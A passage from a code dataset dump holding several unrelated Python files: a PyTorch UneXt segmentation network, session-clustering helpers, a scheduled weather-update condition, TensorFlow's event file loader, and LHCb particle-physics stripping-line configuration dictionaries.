#512\n self.enc3 = m.layer3 #1024\n self.enc4 = m.layer4 #2048\n #aspp with customized dilatations\n self.aspp = ASPP(2048,256,out_c=512,dilations=[stride*1,stride*2,stride*3,stride*4])\n self.drop_aspp = nn.Dropout2d(0.5)\n #decoder\n self.dec4 = UnetBlock(512,1024,256)\n self.dec3 = UnetBlock(256,512,128)\n self.dec2 = UnetBlock(128,256,64)\n self.dec1 = UnetBlock(64,64,32)\n self.fpn = FPN([512,256,128,64],[16]*4)\n self.drop = nn.Dropout2d(0.1)\n self.final_conv = ConvLayer(32+16*4, 1, ks=1, norm_type=None, act_cls=None)\n\n def forward(self, x):\n enc0 = self.enc0(x)\n enc1 = self.enc1(enc0)\n enc2 = self.enc2(enc1)\n enc3 = self.enc3(enc2)\n enc4 = self.enc4(enc3)\n enc5 = self.aspp(enc4)\n dec3 = self.dec4(self.drop_aspp(enc5),enc3)\n dec2 = self.dec3(dec3,enc2)\n dec1 = self.dec2(dec2,enc1)\n dec0 = self.dec1(dec1,enc0)\n x = self.fpn([enc5, dec3, dec2, dec1], dec0)\n x = self.final_conv(self.drop(x))\n x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False)\n return x\n\nclass UneXt50(nn.Module):\n def __init__(self, stride=1, **kwargs):\n super().__init__()\n #encoder\n m = ResNet(Bottleneck, [3, 4, 23, 3], groups=32, width_per_group=4)\n m = torch.hub.load('facebookresearch/semi-supervised-ImageNet1K-models',\n 'resnext50_32x4d_swsl')\n self.enc0 = nn.Sequential(m.conv1, m.bn1, nn.ReLU(inplace=True))\n self.enc1 = nn.Sequential(nn.MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1),\n m.layer1) #256\n self.enc2 = m.layer2 #512\n self.enc3 = m.layer3 #1024\n self.enc4 = m.layer4 #2048\n #aspp with customized dilatations\n self.aspp = ASPP(2048,256,out_c=512,dilations=[stride*1,stride*2,stride*3,stride*4])\n self.drop_aspp = nn.Dropout2d(0.5)\n #decoder\n self.dec4 = UnetBlock(512,1024,256)\n self.dec3 = UnetBlock(256,512,128)\n self.dec2 = UnetBlock(128,256,64)\n self.dec1 = UnetBlock(64,64,32)\n self.fpn = FPN([512,256,128,64],[16]*4)\n self.drop = nn.Dropout2d(0.1)\n self.final_conv = ConvLayer(32+16*4, 1, ks=1, norm_type=None, act_cls=None)\n\n def forward(self, x):\n enc0 = self.enc0(x)\n enc1 = self.enc1(enc0)\n enc2 = self.enc2(enc1)\n enc3 = self.enc3(enc2)\n enc4 = self.enc4(enc3)\n enc5 = self.aspp(enc4)\n dec3 = self.dec4(self.drop_aspp(enc5),enc3)\n dec2 = self.dec3(dec3,enc2)\n dec1 = self.dec2(dec2,enc1)\n dec0 = self.dec1(dec1,enc0)\n x = self.fpn([enc5, dec3, dec2, dec1], dec0)\n x = self.final_conv(self.drop(x))\n x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False)\n return x\n\n# model = UneXt101().cuda()\n# print(model)","sub_path":"MARS数据科学平台/2021“SEED”第二届江苏大数据开发与应用大赛(华录杯)——医疗卫生赛道/code/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":10783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"641103568","text":"\n\n\n\ndef get_evisession(datas,t_lo,gap):\n t_result = {}\n for data in datas:\n t_key = data.data[t_lo:t_lo+gap]\n if t_key not in t_result:\n t_result[t_key] = []\n t_result[t_key].append(data)\n else:\n t_result[t_key].append(data)\n return t_result\n\ndef clusession_byt(datas,t_time):\n length = len(datas)\n i = 0\n t_result = []\n while(i < length - 1):\n t_r = []\n t_r.append(datas[i])\n j = 1\n while(j + i < length):\n t_lo = i + j\n if(datas[t_lo].date - t_r[-1].date > t_time):\n break;\n else:\n t_r.append(datas[t_lo])\n j = j + 1\n t_result.append(t_r)\n i = i + j\n return t_result\n\ndef test_rate(result,t_lo,gap):\n t_zhichi = 0\n for t_r in result:\n t_len = len(t_r)\n if(t_len > 0):\n t_s = t_r[0].data[t_lo:t_lo+gap]\n else:\n continue\n j = 1\n t_lo = 0\n while(j < t_len):\n if(t_r[j].data[t_lo:t_lo+gap] != t_s):\n t_lo = 1\n break\n j = j + 1\n if t_lo == 0:\n t_zhichi = t_zhichi + 1\n return float(t_zhichi)/float(len(result))\n\n\n\n\n\n\n\n\n","sub_path":"Reverse_Tool/deal_data/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"582159096","text":"\"\"\"\nweather_conditions\n\"\"\"\n\nimport logging\nfrom apscheduler.triggers.cron import CronTrigger\nfrom pubsub import pub\nfrom condition import Condition\n\nLOGGER = logging.getLogger(__name__)\n\nCONDITION_CLASS_NAME = 'WeatherConditions'\n\nclass WeatherConditions(Condition):\n \"\"\"\n WeatherConditions\n\n Conditions for reading weather data\n \"\"\"\n\n def __init__(self, scheduler, schedule='0 * * * *'):\n \"\"\"\n Constructor\n \"\"\"\n\n Condition.__init__(self, scheduler, schedule)\n scheduler.add_job(self.evaluate, CronTrigger.from_crontab(schedule))\n LOGGER.debug('Initialized')\n\n def evaluate(self, msg=None):\n \"\"\"\n Handler for receiving messages\n \"\"\"\n\n LOGGER.info('Evaluating')\n pub.sendMessage('weather.update', msg=None)\n","sub_path":"conditions/weather_conditions.py","file_name":"weather_conditions.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"537856042","text":"# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"Functionality for loading events from a record file.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\n\nclass EventFileLoader(object):\n \"\"\"An EventLoader is an iterator that yields Event protos.\"\"\"\n\n def __init__(self, file_path):\n if file_path is None:\n raise ValueError('A file path is required')\n file_path = tf.resource_loader.readahead_file_path(file_path)\n tf.logging.debug('Opening a record reader pointing at %s', file_path)\n with tf.errors.raise_exception_on_not_ok_status() as status:\n self._reader = tf.pywrap_tensorflow.PyRecordReader_New(\n tf.compat.as_bytes(file_path), 0, tf.compat.as_bytes(''), status)\n # Store it for logging purposes.\n self._file_path = file_path\n if not self._reader:\n raise IOError('Failed to open a record reader pointing to %s' % file_path)\n\n def Load(self):\n \"\"\"Loads all new values from disk.\n\n Calling Load multiple times in a row will not 'drop' events as long as the\n return value is not iterated over.\n\n Yields:\n All values that were written to disk that have not been yielded yet.\n \"\"\"\n tf.logging.debug('Loading events from %s', self._file_path)\n while True:\n try:\n with tf.errors.raise_exception_on_not_ok_status() as status:\n self._reader.GetNext(status)\n except (tf.errors.DataLossError, tf.errors.OutOfRangeError):\n # We ignore partial read exceptions, because a record may be truncated.\n # PyRecordReader holds the offset prior to the failed read, so retrying\n # will succeed.\n break\n event = tf.Event()\n event.ParseFromString(self._reader.record())\n yield event\n tf.logging.debug('No more events in %s', self._file_path)\n\n\ndef main(argv):\n if len(argv) != 2:\n print('Usage: event_file_loader ')\n return 1\n loader = EventFileLoader(argv[1])\n for event in loader.Load():\n print(event)\n return 0\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"Tensorflow_Pandas_Numpy/source3.6/tensorboard/backend/event_processing/event_file_loader.py","file_name":"event_file_loader.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414421586","text":"\"\"\"\nLine config dictionaries for the RD WG\n\n\nDictionary names should have the same name as the corresponding\nStrippingSelections file containing the line builder instance.\n\n e.g StrippingPromptCharm linebuilder should be added as:\n\n PromptCharm = { ... }\n\"\"\"\n\nfrom GaudiKernel.SystemOfUnits import * \n\n# Bd2KstarMuMu for MVA\n# J. Dickens, M. Patel \n\nBd2KstarMuMu = {\n 'BUILDERTYPE' : 'StrippingBdToKstarMuMuConf',\n 'CONFIG' : { \n 'UseNoPIDsHadrons' : True,\n 'Prescale_BdToKstarMuMu' : 1.0,\n 'Postscale_BdToKstarMuMu' : 1.0,\n 'Prescale_BdToKstarMuMuSS' : 1.0,\n 'Postscale_BdToKstarMuMuSS' : 1.0,\n 'Prescale_BuToKMuMu' : 1.0,\n 'Postscale_BuToKMuMu' : 1.0,\n 'Prescale_BuToKMuMuSS' : 1.0,\n 'Postscale_BuToKMuMuSS' : 1.0,\n 'B_Comb_MassLow' : 4600.0,\n 'B_Comb_MassHigh' : 6000.0,\n 'B_MassLow' : 4850.0,\n 'B_MassHigh' : 5780.0,\n 'B_VertexCHI2' : 6.0,\n 'B_IPCHI2' : 16.0,\n 'B_DIRA' : 0.9999,\n 'B_FlightCHI2' : 121.0,\n 'B_Dau_MaxIPCHI2' : 9.0, \n 'Dau_VertexCHI2' : 12.0,\n 'Dau_DIRA' : -0.9,\n 'Kstar_Comb_MassLow' : 550.0,\n 'Kstar_Comb_MassHigh' : 2200.0,\n 'Kstar_MassLow' : 600.0,\n 'Kstar_MassHigh' : 2000.0,\n 'Kstar_MinIPCHI2' : 0.0,\n 'Kstar_FlightChi2' : 9.0, \n 'Kstar_Dau_MaxIPCHI2' : 9.0, \n 'Dimu_FlightChi2' : 9.0, \n 'Dimu_Dau_MaxIPCHI2' : 9.0, \n 'Track_CHI2nDOF' : 5.0,\n 'Hadron_MinIPCHI2' : 9.0, \n 'Muon_MinIPCHI2' : 9.0,\n 'Muon_IsMuon' : False,\n 'MuonNoPIDs_PIDmu' : 0.0\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n\n# B2XMuMu for RD\n# P. Schaak, M. Patel, P. Owen & T.Blake\n\nB2XMuMu = {\n 'BUILDERTYPE' : 'B2XMuMuConf',\n 'CONFIG' : {\n 'BVXCHI2NDOF' : 8 # dimensionless\n , 'BIPCHI2' : 9.0 # dimensionless\n , 'BDIRA' : 0.999968 # dimensionless\n , 'BFDCHI2' : 100.0 # dimensionless\n , 'KpiMINIPCHI2' : 9.0 # dimensionless\n , 'KpiTRACKCHI2' : 4.0 # dimensionless \n , 'KpiVXCHI2NDOF' : 9.0 # dimensionless\n , 'MuonMINIPCHI2' : 16.0 # dimensionless\n , 'MuonTRACKCHI2' : 4.0 # dimensionless\n , 'MuonPID' : 0.0 # dimensionless\n , 'DimuonVXCHI2NDOF' : 9.0 # dimensionless\n , 'DimuonUPPERMASS' : 5050.0 # MeV\n , 'Pi0MINPT' : 800.0 # MeV\n , 'DplusLOWERMASS' : 1600.0 # MeV\n , 'DplusUPPERMASS' : 2300.0 # MeV \n , 'KstarplusWINDOW' : 300.0 # MeV \n , 'KsWINDOW' : 30.0 # MeV \n , 'LambdaWINDOW' : 30.0 # MeV \n , 'LongLivedPT' : 500.0 # MeV \n , 'LongLivedTau' : 2 # ps \n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n# Bs2MuMuPhi\n# P. Schaak\n\nBs2MuMuPhi = {\n 'BUILDERTYPE' : 'Bs2MuMuPhiConf' ,\n 'CONFIG' : {\n 'BsIPCHI2' : 9.0 # dimensionless\n , 'BsLT' : 0.0002 # ns\n , 'BsVertexCHI2' : 40.0 # dimensionless\n , 'KaonPIDK' : 0 # dimensionless\n , 'KaonMINIPCHI2' : 9.0 # dimensionless\n , 'MuonMINIPCHI2' : 9.0 # dimensionless\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n# Same-sign searches\n# S. Redford & Wenbin \n\nB2XMuMuSS = {\n 'BUILDERTYPE' : 'B2XMuMuSSConf',\n 'CONFIG' : {\n 'MuonP' : 3000. , #MeV\n 'MuonPT' : 500. , #MeV\n 'MuonMINIPCHI2' : 5 , #adminensional\n 'PionP' : 2000. , #MeV\n 'PionPT' : 500. , #MeV\n 'PionMINIPCHI2' : 5 , #adminensional\n 'KaonP' : 2000. , #MeV\n 'KaonPT' : 500. , #MeV\n 'KaonMINIPCHI2' : 5 , #adminensional\n 'DimuonMass' : 0. , #MeV\n 'BVCHI2DOF' : 7 , #adminensional \n 'BDIRA' : 0.9998 , #adimensional\n 'BIPCHI2' : 30 , #adimensional\n 'BMassWin' : 400. , #MeV, mass window\n 'B2PiMuMuOSLinePrescale' : 1 ,\n 'B2PiMuMuOSLinePostscale' : 1 ,\n 'B2PiMuMuSSLinePrescale' : 1 ,\n 'B2PiMuMuSSLinePostscale' : 1 ,\n 'B2KMuMuOSLinePrescale' : 1 ,\n 'B2KMuMuOSLinePostscale' : 1 ,\n 'B2KMuMuSSLinePrescale' : 1 ,\n 'B2KMuMuSSLinePostscale' : 1\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n# HyperCP lines\n# Vanya + Andrei\n\nHyperCP = {\n 'BUILDERTYPE' : 'StrippingHyperCPXConf',\n 'CONFIG' : {\n 'ProtonCuts' : ' ( TRCHI2DOF < 5 ) & ( 0 < PIDp - PIDpi ) & ( BPVIPCHI2() > 12 ) ' , \n 'MuonCuts' : ' ( TRCHI2DOF < 5 ) & ISMUON & ( BPVIPCHI2() > 12 ) ' , \n 'PionCuts' : ' ( TRCHI2DOF < 5 ) & ( BPVIPCHI2() > 12 ) ' ,\n 'MuonCuts_forTau23Mu' : ' ( PT > 300 * MeV ) & ( TRCHI2DOF < 5 ) & ISMUON & ( BPVIPCHI2() > 9 ) ' , \n 'PionCuts_forTau23Mu' : ' ( PT > 300 * MeV ) & ( TRCHI2DOF < 5 ) & ( BPVIPCHI2() > 9 ) ' ,\n #\n 'SigmaCTau' : 5 * mm ,\n 'SigmaMass' : 250 * MeV ,\n #\n 'DsCTau' : 200 * micrometer ,\n 'Ds23PiMass' : 80 * MeV ,\n 'Ds2PhiPiMass' : 250 * MeV,\n #\n 'DplusCTau' : 200 * micrometer ,\n 'DplusMass' : 250 * MeV ,\n #\n # ``Global Event Cuts''\n #\n 'PrimaryVertices' : True ,\n #\n # Technicalities:\n #\n 'Preambulo' : [\n # shortcut for chi2 of vertex fit \n 'chi2vx = VFASPF(VCHI2) ' , \n # shortcut for the c*tau\n \"from GaudiKernel.PhysicalConstants import c_light\" , \n ## use the embedded cut for chi2(LifetimeFit)<9\n \"ctau = BPVLTIME ( 9 ) * c_light \" ,\n \"ctau_forDs = BPVLTIME ( 225 ) * c_light \" ,\n ## phi(1020) mass-window \n \"phi = in_range ( 920 * MeV , AM23 , 1120 * MeV )\"\n ] , \n #\n # Prescales\n #\n 'SigmaPrescale' : 1.0 ,\n 'DplusPrescale' : 1.0 ,\n 'DsPrescale' : 1.0 ,\n 'Ds3PiPrescale' : 0.2\n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n# Same-sign searches\n# Wenbin \n\nB2SameChargeMuon = {\n 'BUILDERTYPE' : 'StrippingB2SameChargeMuonConf',\n 'CONFIG' : { \n 'LinePrescale' : 1. ,\n 'LinePostscale' : 1.\n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n# Bu2LLK ( B+ -> ee K and mu mu K )\n# P. Koppenburg\n\nBu2LLK = {\n 'BUILDERTYPE' : 'Bu2LLKConf',\n 'CONFIG' : {\n 'BFlightCHI2' : 100 # adimentional \n , 'BDIRA' : 0.9995 # adimentional TIGHTENED\n , 'BIPCHI2' : 25 # adimentional \n , 'BVertexCHI2' : 16 # adimentional\n , 'DiLeptonPT' : 0 # MeV (not used)\n , 'DiLeptonFDCHI2' : 16 # adimentional\n , 'DiLeptonIPCHI2' : 9 # adimentional\n , 'LeptonIPCHI2' : 16 # adimentional TIGHTENED\n , 'LeptonPT' : 800 # MeV \n , 'KaonIPCHI2' : 16 # adimentional TIGHTENED\n , 'KaonPT' : 800 # MeV LOOSENED\n , 'UpperMass' : 5500 # MeV (Higher bound of signal box)\n , 'Bu2eeKLinePrescale' : 1\n , 'Bu2eeKLinePostscale' : 1\n , 'Bu2mmKLinePrescale' : 1\n , 'Bu2mmKLinePostscale' : 1\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : ['Dimuon']\n #{ 'Dimuon' : [ 'StrippingBu2LLK_mmLine' ] , 'Dielectron' : [ 'StrippingBu2LLK_eeLine' ] } \n }\n\n# B2MuMuMuMuLines\n# J. Albrecht\n\nB2MuMuMuMuLines = {\n 'BUILDERTYPE' : 'B2MuMuMuMuLinesConf',\n 'CONFIG' : {\n 'B2MuMuMuMuLinePrescale' : 1,\n 'B2MuMuMuMuLinePostscale' : 1,\n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n# Stripping TriMuons\n# Vanya \n\nTriMuon = {\n 'BUILDERTYPE' : 'StrippingTriMuonsConf',\n 'CONFIG' : {\n 'GoodMuons' : \" ( PT > 300 * MeV ) & ( TRCHI2DOF < 5 ) & ( BPVIPCHI2 () > 6 ) \" ,\n 'GoodMuonsForBc' : \" ( BPVIPCHI2 () > 9 ) \" ,\n 'TightMuons' : \" ( PT > 1.9 * GeV ) & ( BPVIPCHI2 () > 25 ) \" ,\n #\n # Trigger \n #\n 'HLT' : None , \n #\n # Prescale \n #\n '3mu-Prescale' : 1.00 , \n 'Bc-Prescale' : 1.00 , \n 'Tau-Prescale' : 1.00 , \n #\n # Technicalities:\n #\n 'Preambulo' : [\n ## shortcut for chi2 of vertex fit \n 'chi2vx = VFASPF(VCHI2) ' ,\n ## shortcut for the c*tau\n \"from GaudiKernel.PhysicalConstants import c_light\" ,\n \"ctau = BPVLTIME ( ) * c_light \" ,\n \"ctauBc = PDGM('B_c+') / M * BPVLTIME ( ) * c_light \" \n ]\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : [ 'Dimuon' ] \n }\n\n\n\n# Lines for phi mu mu / f0 mu mu\n# Liming Zhang\n\nBs2PhiMuMu = { \n 'BUILDERTYPE' : 'Bs2PhiMuMuLinesConf',\n 'WGs' : ['RD'],\n 'STREAMS' : ['Dimuon'],\n 'CONFIG' : {\n \"MINIPCHI2\" : 4.00 # adimensiional\n ,\"TRCHI2\" : 10.0 # adimensiional\n ,\"KaonPIDK\" : 1e-10 # adimensiional\n ,\"PhiPT\" : 100 # MeV\n ,\"MuonMINIPCHI2\" : 2.25 # adimensiional\n ,\"MuonPIDmu\" : -5.0 # adimensiional\n ,\"MuonTRCHI2\" : 10.0 # adimensiional\n ,\"BsMassWin\" : 250.0 # MeV\n ,\"BsVCHI2DOF\" : 8.0 # adimensiional\n ,\"BsDIRA\" : 0.9993 # adimensiional\n ,\"BsFDCHI2\" : 25.0 # adimensiional\n ,\"PionPIDK\" : 10.0 # adimensiional\n ,\"f0MassWin\" : 200.0 # MeV\n ,\"VCHI2\" : 10.0 # adimensiional\n ,\"BsIPCHI2\" : 36.0 # adimensiional\n ,\"DocaChi2Max\" : 20 #mm\n }\n }\n\n# Radiative lines\n# F. Soomro, A. Puig \n\nB2XGamma = {\n 'BUILDERTYPE' : 'StrippingB2XGammaConf',\n 'CONFIG' : {\n 'TrIPchi2Phi' : 15. # Dimensionless\n ,'TrIPchi2Kst' : 15. # Dimensionless\n ,'PhiMassWin' : 15. # MeV\n ,'KstMassWin' : 100. # MeV\n ,'KstMassWinSB' : 150. # MeV\n ,'BsMassWin' : 1000. # MeV\n ,'B0MassWin' : 1000. # MeV\n ,'BMassWinSB' : 2000. # MeV\n ,'BsDirAngle' : 0.02 # radians\n ,'B0DirAngle' : 0.02 # radians\n ,'BDirAngleMoni' : 0.06 # radians\n ,'BsPVIPchi2' : 15. # Dimensionless\n ,'B0PVIPchi2' : 15. # Dimensionless\n ,'photonPT' : 2600. # MeV\n ,'PhiVCHI2' : 15. # dimensionless\n ,'KstVCHI2' : 15. # dimensionless\n ,'TrChi2' : 5. # dimensionless\n # Pre- and postscales\n ,'Bs2PhiGammaWideBMassPreScale' : 0.1\n ,'Bs2PhiGammaWideBMassPostScale' : 1.0\n ,'Bs2PhiGammaLooseDiraPreScale' : 0.1\n ,'Bs2PhiGammaLooseDiraPostScale' : 1.0\n ,'Bs2PhiGammaPreScale' : 1.0\n ,'Bs2PhiGammaPostScale' : 1.0\n ,'Bd2KstGammaWideBMassPreScale' : 0.05\n ,'Bd2KstGammaWideBMassPostScale' : 1.0\n ,'Bd2KstGammaLooseDiraPreScale' : 0.05\n ,'Bd2KstGammaLooseDiraPostScale' : 1.0\n ,'Bd2KstGammaWideKstMassPreScale' : 0.05\n ,'Bd2KstGammaWideKstMassPostScale' : 1.0\n ,'Bd2KstGammaWidePreScale' : 0.05\n ,'Bd2KstGammaWidePostScale' : 1.0\n ,'Bd2KstGammaPreScale' : 1.0\n ,'Bd2KstGammaPostScale' : 1.0\n },\n 'WGs' : ['RD'],\n 'STREAMS' : [ 'Radiative' ] \n }\n\n# Bd2eeKstar\n# J. He\n\nBd2eeKstar = {\n 'BUILDERTYPE' : 'Bd2eeKstarConf',\n 'CONFIG' : {\n 'LinePrescale' : 1. ,\n 'LinePostscale' : 1. ,\n #\n 'ElectronPT' : 350. , # MeV\n 'ElectronTrackCHI2pNDOF' : 100. ,\n 'ElectronIPCHI2' : 2.25 ,\n 'ElectronPIDepi' : -2. , \n #\n 'eeCombMinMass' : 0. , # MeV \n 'eeCombMaxMass' : 1550. , # MeV \n 'eeVertexCHI2' : 15. , \n 'eeMinMass' : 20. , # MeV \n 'eeMaxMass' : 1500. , # MeV\n 'eeFD' : 1. , # mm\n #\n 'KaonPT' : 400. , # MeV \n 'KaonP' : 3000. , # MeV \n 'KaonTrackCHI2pNDOF' : 5. , \n 'KaonIPCHI2' : 4. , \n 'KaonPIDKpi' : -5. , \n #\n 'PionPT' : 300. , # MeV\n 'PionP' : 3000. , # MeV \n 'PionTrackCHI2pNDOF' : 5. , \n 'PionIPCHI2' : 4. , \n 'PionPIDpiK' : 10. , # PIDpi-PIDK > -5, i.e., PIDK<5 \n #\n 'KstarComMassW' : 200. , # MeV \n 'KstarVertexCHI2' : 25. , \n 'KstarMassW' : 130. , # MeV\n 'KstarIPCHI2' : 1. , \n 'KstarFDCHI2' : 1. , \n #\n 'BComMassW' : 1200. , # MeV\n 'BVertexCHI2' : 9. , # /ndf\n 'BMassW' : 1000. , # MeV \n 'BIPCHI2' : 64. , # pointing\n 'BFDCHI2' : 9. , \n 'BDIRA' : 0.999, \n 'BIP' : 0.05 , # mm\n 'SumIPSCut' : \" & (SUMTREE(((ABSID=='K+') | (ABSID=='pi-') | (ID=='e+') | (ID=='e-')),sqrt(BPVIPCHI2()))>15)\" \n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Radiative' ]\n }\n\n\n# B2JpsiKstar, Jpsi -> ee \n# J. He\n\nBd2JpsieeKstar = {\n 'BUILDERTYPE' : 'Bd2JpsieeKstarConf',\n 'CONFIG' : {\n 'LinePrescale' : 1. ,\n 'LinePostscale' : 1. ,\n #\n 'ElectronPT' : 350. , # MeV\n 'ElectronTrackCHI2pNDOF' : 100. ,\n 'ElectronIPCHI2' : 2.25 ,\n 'ElectronPIDepi' : -2. , \n #\n 'eeCombMinMass' : 2100. , # MeV \n 'eeCombMaxMass' : 4300. , # MeV \n 'eeVertexCHI2' : 15. , \n 'eeMinMass' : 2200. , # MeV \n 'eeMaxMass' : 4200. , # MeV\n 'eeFD' : 1. , # mm\n #\n 'KaonPT' : 400. , # MeV \n 'KaonP' : 3000. , # MeV \n 'KaonTrackCHI2pNDOF' : 5. , \n 'KaonIPCHI2' : 4. , \n 'KaonPIDKpi' : -5. , \n #\n 'PionPT' : 300. , # MeV\n 'PionP' : 3000. , # MeV \n 'PionTrackCHI2pNDOF' : 5. , \n 'PionIPCHI2' : 4. , \n 'PionPIDpiK' : 10. , # PIDpi-PIDK > -5, i.e., PIDK<5 \n #\n 'KstarComMassW' : 200. , # MeV \n 'KstarVertexCHI2' : 25. , \n 'KstarMassW' : 130. , # MeV\n 'KstarIPCHI2' : 1. , \n 'KstarFDCHI2' : 1. , \n #\n 'BComMassW' : 1200. , # MeV\n 'BVertexCHI2' : 9. , # /ndf\n 'BMassW' : 1000. , # MeV \n 'BIPCHI2' : 64. , # pointing\n 'BFDCHI2' : 9. , \n 'BDIRA' : 0.999, \n 'BIP' : 0.05 , # mm\n 'SumIPSCut' : \" & (SUMTREE(((ABSID=='K+') | (ABSID=='pi-') | (ID=='e+') | (ID=='e-')),sqrt(BPVIPCHI2()))>15)\" \n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Radiative' ] \n }\n\n\n# J. Albrecht\n# Lines for Bs -> mu mu WG\n\nBs2MuMuLines = {\n 'BUILDERTYPE' : 'Bs2MuMuLinesConf',\n 'CONFIG' : {\n 'DefaultLinePrescale' : 1,\n 'DefaultLinePostscale' : 1,\n 'Bs2mmWideLinePrescale' : 1,\n 'Bs2mmWideLinePostscale' : 1,\n 'LooseLinePrescale' : 0.02,\n 'LooseLinePostscale' : 1,\n 'BuPrescale' : 1,\n 'BuPostscale' : 1,\n 'BsPrescale' : 1,\n 'BsPostscale' : 1,\n 'BdPrescale' : 1,\n 'BdPostscale' : 1,\n 'JPsiLinePrescale' : 1,\n 'JPsiLinePostscale' : 1,\n 'JPsiLooseLinePrescale' : 0.1,\n 'JPsiLooseLinePostscale' : 1,\n 'JPsiPromptLinePrescale' : 0.005,\n 'JPsiPromptLinePostscale': 1,\n 'MuIPChi2_loose' : 9,\n 'MuTrChi2_loose' : 10,\n 'BIPChi2_loose' : 64,\n 'BFDChi2_loose' : 100\n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n# Diego + Xabier\n\nKS02MuMu = {\n 'BUILDERTYPE' : 'K0s2MuMuLinesConf',\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ],\n 'CONFIG' : {\n 'NoMuIDLinePrescale' : 1e-03,\n 'NoMuIDLinePostscale' : 1,\n 'K0s2mmLinePrescale' : 1,\n 'K0s2mmLinePostscale' : 1\n }\n}\n\n# N. Serra, Vava\nB2XTau = {\n 'BUILDERTYPE' : 'B2XTauConf',\n 'STREAMS' : ['Bhadron'],\n 'WGs' : ['RD'] ,\n 'CONFIG' : {\n 'PT_HAD_ALL_FINAL_STATE' : '200', # MeV\n 'P_HAD_ALL_FINAL_STATE' : '2000', # MeV\n 'IPCHI2_HAD_ALL_FINAL_STATE' : '9', # dimensionless\n 'TRACKCHI2_HAD_ALL_FINAL_STATE' : '4', # dimensionless\n #\n 'PT_MU' : '800', # MeV\n 'P_MU' : '6000', # MeV \n 'IPCHI2_MU' : '16', # MeV \n #\n 'PT_B_TT' : '5000', # MeV\n 'PT_B_TT_HIGH' : '10000', # MeV \n 'PT_B_TM' : '2000', # MeV\n 'PT_B_TM_HIGH' : '7500', # MeV \n 'VCHI2_B' : '100', # dimensionless\n 'FDCHI2_B' : '144', # dimensionless\n 'DIRA_B' : '0.99', # dimensionless\n 'MASS_LOW_B' : '2000', # MeV \n 'MASS_HIGH_B' : '5750', # MeV\n 'MCOR_LOW_B' : '4000', # MeV\n 'MCOR_HIGH_B' : '7000', # MeV\n 'MIPCHI2_B' : '150', # dimensionless \n 'MIPCHI2_B_HIGH' : '36', # dimensionless \n #\n 'PT_TAU' : '1500', # MeV\n 'VCHI2_TAU' : '20', # dimensionless\n 'IPCHI2_TAU' : '9', # dimensionless\n 'FDCHI2_TAU' : '144', # dimensionless\n 'MASS_LOW_TAU' : '700', # MeV\n 'MASS_HIGH_TAU' : '1800', # MeV\n #\n 'PT_B_CHILD_BEST' : '1800', # MeV\n 'P_B_CHILD_BEST' : '10000',# MeV\n 'IPCHI2_B_CHILD_BEST' : '16', # dimensionless\n 'PT_B_TAU_CHILD_BEST' : '3000', # MeV\n 'IPCHI2_B_TAU_CHILD_BEST' : '16', # dimensionless\n #\n 'MASS_LOW_D' : '1800', # MeV\n 'MASS_HIGH_D' : '2030', # MeV \n #\n 'B2TauTau_TOSLinePrescale' : 1,\n 'B2TauTau_TOSLinePostscale' : 1,\n 'B2DD_TOSLinePrescale' : 1,\n 'B2DD_TOSLinePostscale' : 1,\n 'B2TauMu_TOSLinePrescale' : 1,\n 'B2TauMu_TOSLinePostscale' : 1,\n 'B2DMu_TOSLinePrescale' : 0.2,\n 'B2DMu_TOSLinePostscale' : 1,\n 'B2TauTau_TISLinePrescale' : 1,\n 'B2TauTau_TISLinePostscale' : 1,\n 'B2DD_TISLinePrescale' : 1,\n 'B2DD_TISLinePostscale' : 1,\n 'B2TauMu_TISLinePrescale' : 1,\n 'B2TauMu_TISLinePostscale' : 1,\n 'B2DMu_TISLinePrescale' : 0.2,\n 'B2DMu_TISLinePostscale' : 1.\n }\n }\n\nTau2PMuMu = { \n 'BUILDERTYPE' : 'StrippingTau2PMuMuConf',\n 'STREAMS' : ['Dimuon'],\n 'WGs' : [ 'RD' ] ,\n 'CONFIG' : {\n #\n # Selection of basic muons and protons \n #\n 'GoodMuons' : \" ( PT > 300 * MeV ) & ( TRCHI2DOF < 3 ) & ( PIDmu > -5 ) & ( (PIDmu - PIDK) > 0 )\" ,\n 'GoodProtons' : \" 